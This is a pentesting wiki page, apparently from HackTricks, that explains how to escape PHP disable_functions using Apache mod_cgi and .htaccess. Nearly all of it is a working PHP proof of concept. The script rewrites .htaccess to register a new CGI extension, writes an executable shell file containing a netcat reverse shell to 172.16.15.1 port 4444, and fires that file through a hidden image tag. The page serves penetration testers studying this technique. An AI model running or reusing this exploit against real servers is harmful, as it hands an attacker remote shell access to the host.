disable-functions-bypass-mod-cgi.md (2792B)
1 --- 2 title: "modcgi" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # mod_cgi 14 15 When Apache enables `mod_cgi` alongside PHP, an attacker who can write both `.htaccess` and a file in a web-accessible directory may register a new CGI extension and execute that file outside the PHP interpreter. The following proof of concept checks those prerequisites, writes the handler configuration, and invokes a shell script.<sup>[[1]](#references)</sup> 16 17 ```php 18 <?php 19 // Requires mod_cgi, a writable directory, and .htaccess overrides. 20 $cmd = "nc -c '/bin/bash' 172.16.15.1 4444"; // Command to execute. 21 $shellfile = "#!/bin/bash\n"; 22 $shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; // CGI response header. 23 $shellfile .= "$cmd"; 24 function checkEnabled($text, $condition, $yes, $no) 25 { 26 echo "$text: " . ($condition ? $yes : $no) . "<br>\n"; 27 } 28 if (!isset($_GET['checked'])) 29 { 30 @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); // Test whether .htaccess is honored. 31 header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); // Run the check again. 32 } 33 else 34 { 35 $modcgi = in_array('mod_cgi', apache_get_modules()); 36 $writable = is_writable('.'); 37 $htaccess = !empty($_SERVER['HTACCESS']); 38 checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No"); 39 checkEnabled("Is writable",$writable,"Yes","No"); 40 checkEnabled("htaccess working",$htaccess,"Yes","No"); 41 if(!($modcgi && $writable && $htaccess)) 42 { 43 echo "Error. All of the above must be true for the script to work!"; 44 } 45 else 46 { 47 checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Succeeded! Saved in .htaccess.bak","Failed!"); 48 checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); 49 checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); 50 checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); 51 echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>"; 52 } 53 } 54 ?> 55 ``` 56 57 ## References 58 59 - [1] [asdizzle/php-disable_functions-bypass: `mod_cgi` and `.htaccess` proof of concept](https://github.com/asdizzle/php-disable_functions-bypass)